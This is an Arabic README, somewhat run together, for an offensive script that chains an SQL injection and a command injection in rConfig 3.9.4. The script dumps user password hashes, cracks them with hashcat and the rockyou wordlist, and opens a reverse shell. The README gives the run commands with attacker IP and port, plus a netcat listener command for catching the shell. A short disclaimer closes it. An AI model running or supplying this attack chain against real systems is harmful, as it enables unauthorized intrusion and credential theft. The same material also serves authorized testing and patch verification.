
PoCs مجمعة لـ rConfig: SQL Injection (CVE-2020-10220) و Command Injection (CVE-2020-10879)
يستهدف هذا PoC إصدار rConfig 3.9.4 ويوضح الاستغلال من خلال مزيج من ثغرات حقن SQL وحقن الأوامر عن بعد. يقوم بأتمتة عملية:
rockyou وقواعد best64.rulesيعتمد هذا السكريبت على اثنين من PoCs الأصليين ويجمعهما:
تم تعديله لأتمتة الكسر والإطلاق الاختياري للقشرة.
requests (pip install requests)hashcat مثبت ويمكن الوصول إليه عبر سطر الأوامرrockyou.txt (أو ما يعادلها) موجودة في /usr/share/wordlists/rockyou.txt/usr/share/hashcat/rules/best64.ruleلتفريغ المستخدمين والتجزئات فقط:
python3 rConfig_rce.py https://target
لتفريغ المستخدمين، وكسر كلمات المرور، ومحاولة RCE (يتطلب عنوان IP ومنفذ المهاجم للقشرة العكسية):
python3 rConfig_rce.py https://target attacker_ip attacker_port
admin في مرحلة حقن الأوامر.nc -lvnp 80) يعمل على جهاز المهاجم لالتقاط القشرة العكسية.هذه الأداة مخصصة فقط لاختبار الأمان المصرح به والأغراض التعليمية. الاستخدام غير المصرح به ضد الأنظمة دون إذن غير قانوني وغير أخلاقي.